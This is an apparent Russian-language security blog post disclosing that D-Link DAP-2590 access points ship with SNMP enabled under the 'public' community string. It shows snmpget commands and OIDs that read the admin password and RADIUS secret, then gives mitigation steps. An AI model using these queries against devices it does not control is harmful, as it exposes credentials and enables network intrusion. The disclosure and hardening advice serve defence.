Всем хороши беспроводные точки доступа D-Link DAP-2590. 802.11n есть. Два диапазона поддерживают. Несколько SSID создавать можно. Покрытие достойное. И цена, как это свойственно продукции D-Link, весьма и весьма демократична.

Правда, одно пятно на солнце мы все-таки отыскали. Оказывается, на всех точках по умолчанию включен SNMP со строкой public. Следовательно, у DAP-2590 можно выведать разные интересные вещи. Загрузку процессора или сетевого интерфейса, например. И до кучи — секрет RADIUS вместе с паролем администратора:

$ snmpget -c public 10.10.0.11 SNMPv2-SMI::enterprises.171.10.37.36.4.1.1.1.3.1
SNMPv2-SMI::enterprises.171.10.37.36.4.1.1.1.3.1 = STRING: "adminPassword"

$ snmpget -c public 10.10.0.11 SNMPv2-SMI::enterprises.171.10.37.36.2.1.3.3.2.1.1.10.1
SNMPv2-SMI::enterprises.171.10.37.36.2.1.3.3.2.1.1.10.1 = STRING: "mylonglonglonglongRADIUSsecret"

К сожалению, поддержка D-Link ответила в стиле «це не баг, це фіча», поэтому шанс на какое-то исправление данной особенности в будущих прошивках стремится к нулю. Тем не менее, пару глубокомысленных выводов из этой ситуации все-таки сделать можно:

1. Управление всеми устройствами должно быть вынесено в изолированную сеть.
2. Настройки по умолчанию далеко не всегда идеальны.

Наконец, если вы являетесь счастливым владельцем беспроводной точки D-Link — проверьте на ней настройки SNMP. На DAP-2590 для этого нужно зайти в Maintenance → Administration Settings, поставить галочку напротив пункта SNMP Settings и поменять значения параметров Public Community String и Private Community String на более оригинальные. После этого останется только нажать на Save и применить конфигурацию (Configuration → Save and Activate).